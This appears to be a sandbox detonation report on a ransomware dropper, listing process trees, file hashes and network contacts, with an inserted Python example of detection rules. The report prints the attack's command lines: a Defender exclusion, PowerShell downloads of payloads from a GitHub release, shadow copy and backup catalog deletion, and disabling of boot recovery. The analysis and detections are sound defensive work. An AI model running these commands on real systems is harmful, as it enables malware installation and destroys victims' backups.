PID 1420 wrote to memory of 4884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 4884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 3792 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 3792 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 1420 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 1420 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe
PID 1420 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe
PID 1420 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe
PID 1420 wrote to memory of 4700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 4700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3412 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 3412 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 3412 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 4400 wrote to memory of 3716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4400 wrote to memory of 3716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4400 wrote to memory of 3716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4400 wrote to memory of 4944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4400 wrote to memory of 4944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4400 wrote to memory of 4944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4400 wrote to memory of 4260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4400 wrote to memory of 4260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4400 wrote to memory of 4260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3412 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 3412 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 3412 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 4004 wrote to memory of 2844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4004 wrote to memory of 2844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4004 wrote to memory of 2844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4004 wrote to memory of 3960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4004 wrote to memory of 3960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4004 wrote to memory of 3960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2024 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 2024 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 2828 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 2828 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 4292 wrote to memory of 624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4292 wrote to memory of 624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4292 wrote to memory of 3124 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4292 wrote to memory of 3124 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2828 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 2828 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 1680 wrote to memory of 3528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1680 wrote to memory of 3528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1680 wrote to memory of 1308 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1680 wrote to memory of 1308 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2828 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 2828 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 3900 wrote to memory of 3448 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 3900 wrote to memory of 3448 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2828 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\system32\NOTEPAD.EXE
PID 2828 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\system32\NOTEPAD.EXE

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\610C.tmp\610D.tmp\610E.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"

C:\Users\Admin\AppData\Local\Temp\build.exe

"C:\Users\Admin\AppData\Local\Temp\build.exe"

C:\Users\Admin\AppData\Local\Temp\kernelv.exe

"C:\Users\Admin\AppData\Local\Temp\kernelv.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3412 -ip 3412

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 2472

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
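The process list above is the whole chain in clear text: the batch script checks for admin with net session, adds a Defender exclusion for %TEMP%, pulls build.exe and kernelv.exe from GitHub with iwr, removes the exclusion, and the two payloads then delete shadow copies and the backup catalog, disable boot recovery with bcdedit, and enumerate saved Wi-Fi profiles with netsh. The following is an added detection example, not part of the sandbox report: it runs command-line and image-path rules over constructed process-creation records built from the command lines and PIDs shown in this report. The record layout (pid, ppid, image, cmdline), the rule names, and the ATT&CK mappings are this example's own assumptions, modelled on a Sysmon Event ID 1 style event.

```python
"""Command-line and image-path detections for the behaviour recorded above.

Added example, not part of the sandbox report. EVENTS is constructed from the
command lines and PIDs the report shows; the record layout is an assumption
modelled on a process-creation event such as Sysmon Event ID 1.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# (rule name, ATT&CK technique, pattern over the command line); names and
# technique mappings are this example's choices, not the sandbox's signatures.
CMDLINE_RULES = [
    ("shadow_copy_deletion", "T1490",
     re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("boot_recovery_disabled", "T1490",
     re.compile(r"bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+"
                r"(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("backup_catalog_deletion", "T1490",
     re.compile(r"wbadmin(?:\.exe)?\s+delete\s+catalog", re.I)),
    ("defender_exclusion_added", "T1562.001",
     re.compile(r"Set-MpPreference\b.*-ExclusionPath", re.I)),
    ("powershell_execution_policy_bypass", "T1059.001",
     re.compile(r"-ExecutionPolicy\s+Bypass", re.I)),
    # iwr/Invoke-WebRequest writing its -OutFile somewhere under a \Temp\ directory
    ("powershell_download_to_temp", "T1105",
     re.compile(r'\b(?:iwr|Invoke-WebRequest)\b.*?-OutFile\s+\\?"?[A-Za-z]:\\[^"]*\\Temp\\', re.I)),
    ("wifi_profile_enumeration", "T1016.002",
     re.compile(r"netsh(?:\.exe)?\s+wlan\s+show\s+(?:profiles?|networks)", re.I)),
]

# Binaries that legitimately live only under the Windows system directories
# (assumes C: is the system drive).
SYSTEM_BINARY_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "services.exe", "winlogon.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")


def is_masquerading_system_binary(image: str) -> bool:
    """True for a system binary name started from outside System32/SysWOW64,
    e.g. the svchost.exe that build.exe drops into the user's roaming profile."""
    directory, _, name = image.rpartition("\\")
    if name.lower() not in SYSTEM_BINARY_NAMES:
        return False
    return not directory.lower().startswith(SYSTEM_DIRS)


def evaluate(ev: ProcEvent) -> list[tuple[str, str]]:
    """Return the (rule name, technique) pairs that fire for one event."""
    hits = [(name, tech) for name, tech, rx in CMDLINE_RULES if rx.search(ev.cmdline)]
    if is_masquerading_system_binary(ev.image):
        hits.append(("masquerading_system_binary_name", "T1036.005"))
    return hits


def scan(events: list[ProcEvent]) -> dict[int, list[tuple[str, str]]]:
    """Map each PID with at least one hit to its hits; silent PIDs are omitted."""
    return {ev.pid: evaluate(ev) for ev in events if evaluate(ev)}


# Constructed from the report's Processes sections (PIDs are the ones the
# report shows for the same process where it lists one).
EVENTS = [
    ProcEvent(2880, 2760, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"'),
    ProcEvent(2584, 2760, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"'),
    ProcEvent(2828, 2024, r"C:\Users\Admin\AppData\Roaming\svchost.exe",
              r'"C:\Users\Admin\AppData\Roaming\svchost.exe"'),
    ProcEvent(4292, 2828, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete'),
    ProcEvent(1680, 2828, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no'),
    ProcEvent(3448, 3900, r"C:\Windows\system32\wbadmin.exe", r"wbadmin delete catalog -quiet"),
    ProcEvent(3960, 4004, r"C:\Windows\SysWOW64\netsh.exe", r"netsh wlan show networks mode=bssid"),
    ProcEvent(1728, 2828, r"C:\Windows\system32\NOTEPAD.EXE",
              r'"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt'),
]

if __name__ == "__main__":
    for pid, hits in scan(EVENTS).items():
        for name, tech in hits:
            print(f"pid {pid}: {name} ({tech})")
```

The notepad launch of the ransom note is deliberately left in as a negative case; it fires nothing. The three T1490 rules are worth keeping separate in a real deployment because a single vssadmin line is also produced by some backup agents, while bcdedit disabling recovery and wbadmin deleting the catalog in the same parent chain almost never are.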

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp

Files

memory/1868-0-0x0000000140000000-0x0000000140028000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\610C.tmp\610D.tmp\610E.bat

MD5 1c935ef28fdfd394b770d945d7f04d76
SHA1 29e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256 aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512 a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

memory/2576-3-0x00007FFBBC543000-0x00007FFBBC545000-memory.dmp

memory/2576-9-0x0000024704A60000-0x0000024704A82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_55yv0lv5.2wm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2576-14-0x00007FFBBC540000-0x00007FFBBD001000-memory.dmp

memory/2576-15-0x00007FFBBC540000-0x00007FFBBD001000-memory.dmp

memory/2576-18-0x00007FFBBC540000-0x00007FFBBD001000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ada23d35e4a3f1bc35ac8d393cd02675
SHA1 88dd6ddecec82aeafba2b6368078c7c70b88fcac
SHA256 98d17949831dda7243aa8b24a66443eee75d0805996826290fbe1a75bfc79e72
SHA512 0acae33f83787122b779b8b1b41580f4595eb44c74ef0035949e3d90103fd22e15ed4af4238985bd58f8a0378dc8bce4d77549ca4bb661c2c515018be99a79e6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6167e0b3b1bfe7811333fb0ff4260abb
SHA1 3ff0163e7819457a077316365ddbf19d8b4ea8f7
SHA256 7550ba7b917b7671dcb9783f7acb31854880f1fa845d7496ad27e013d70f4364
SHA512 d0bc4f05c0eea70d441eef08f77495a1aea546c679c99e75eec34d1d5dc6c2ae2ddc7f1fadae515a74e8d8e90d493ab68c5ea24f33878491250ebd994cd061a5

memory/1868-42-0x0000000140000000-0x0000000140028000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 7605fb5c749eeea0b1b27fdaad78051c
SHA1 28388bf016af085bbcbacf8c516853942f6ec8d3
SHA256 466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93
SHA512 1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

memory/2024-49-0x00000000008E0000-0x0000000000908000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kernelv.exe

MD5 b6054dbe4ed853c2e35291f045a632ba
SHA1 1355fbe1ea1f6bb566921f04512f78590c4b0e41
SHA256 b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4
SHA512 648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 43b0b5c58203d453fd8d31d936d5e6df
SHA1 9e4b7869c15801e1a86c1319919523fe4bd6c841
SHA256 df3e0f7f7ef55cb398b3c25cdc9d0aa5a2868b5ab528d121b4e0146c1fb4b6fb
SHA512 816ebd495eea2f729d79f49b14e7698d32bc563d6569098acc45f0d12e8f8cf10abd2cfdd28a98e7a2798f05dac10d58d04ab89c269598b5a8181feb8fe8ee83

memory/3412-62-0x00000000000D0000-0x000000000010C000-memory.dmp

memory/3412-64-0x00000000048E0000-0x00000000048F2000-memory.dmp

memory/1868-65-0x0000000140000000-0x0000000140028000-memory.dmp

memory/3412-66-0x0000000004AD0000-0x0000000004C92000-memory.dmp

memory/3412-67-0x0000000005A50000-0x0000000005F7C000-memory.dmp

memory/3412-68-0x0000000006400000-0x0000000006466000-memory.dmp

memory/3412-69-0x0000000006610000-0x00000000066A2000-memory.dmp

memory/3412-120-0x00000000070C0000-0x0000000007664000-memory.dmp

C:\Users\Admin\readme.txt

MD5 60d646f40556d78166ad8111d850fc51
SHA1 babaaf0762000dbf4b3f7a93beb35b6d9279d94d
SHA256 a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab
SHA512 3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

MD5 d1457b72c3fb323a2671125aef3eab5d
SHA1 5bab61eb53176449e25c2c82f172b82cb13ffb9d
SHA256 8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1
SHA512 ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

MD5 28d7fcc2b910da5e67ebb99451a5f598
SHA1 a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA256 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA512 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

MD5 ea511fc534efd031f852fcf490b76104
SHA1 573e5fa397bc953df5422abbeb1a52bf94f7cf00
SHA256 e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995
SHA512 f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

MD5 062e358575f650b17d5537a547dba62d
SHA1 b396fb8e5fad0bd3c0e25bcdc511c02c8048f125
SHA256 62457dcf70b8b1c72574ed4acfa8041830554bb005f72564efa8b4d7e5815b02
SHA512 87e74e1d92767823acdb228241ec4081a168de0d9f48472b6a38eee08891e5fb1d629544c9720290bb8cc64b637aa5b3108ee738c291c4f6c6905686358f3e0e

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-22 05:53

Reported

2025-03-22 05:55

Platform

win7-20240903-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2680 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 2680 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 2680 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 2760 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2760 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2760 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2796 wrote to memory of 2888 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2796 wrote to memory of 2888 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2796 wrote to memory of 2888 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2760 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AE9.tmp\AEA.tmp\AEB.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

Network

N/A

Files

memory/2680-0-0x0000000140000000-0x0000000140028000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AE9.tmp\AEA.tmp\AEB.bat

MD5 1c935ef28fdfd394b770d945d7f04d76
SHA1 29e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256 aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512 a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

